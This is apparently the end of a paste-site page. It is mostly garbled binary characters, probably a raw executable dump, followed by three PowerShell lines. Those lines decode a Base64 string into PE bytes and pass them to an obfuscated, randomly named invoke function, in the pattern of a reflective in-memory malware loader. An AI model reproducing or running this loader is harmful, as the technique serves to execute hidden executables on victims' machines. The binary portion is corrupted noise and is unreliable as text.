999&999?9K9[9a9u9999s;y;;;;;<,<d<}<<<< =3=Z===X>k>   P  T   3344889959F9O9;;<3<8<U<<<
=P=9>@>G>N>U>>c>>>>>>5?n???   `     0g000L111'2x22[3t3333w44445\555"6E6666H7p777^88889.9_9l9u99999!:H:Q:X::::;&;@;Q;n;;;< p     k0r0033333333
44!4:4I4\4c4m4444444445'535C5P5W5d5p55555555566646C6V6]6g6666667(777d7y77777788888909E9V9b999	:😃:9:y:::::3;E;;p;;;;;;.<?<P<<<        Q8        405      0                                                                                                                                                                                  "
- [Byte[]]$PEBytes = [Byte[]][Convert]::FromBase64String($PEBytes32)
- Invoke-COVDQSQKASLYKYN -PEBytes $PEBytes
- }
Add Comment
Please, Sign In to add comment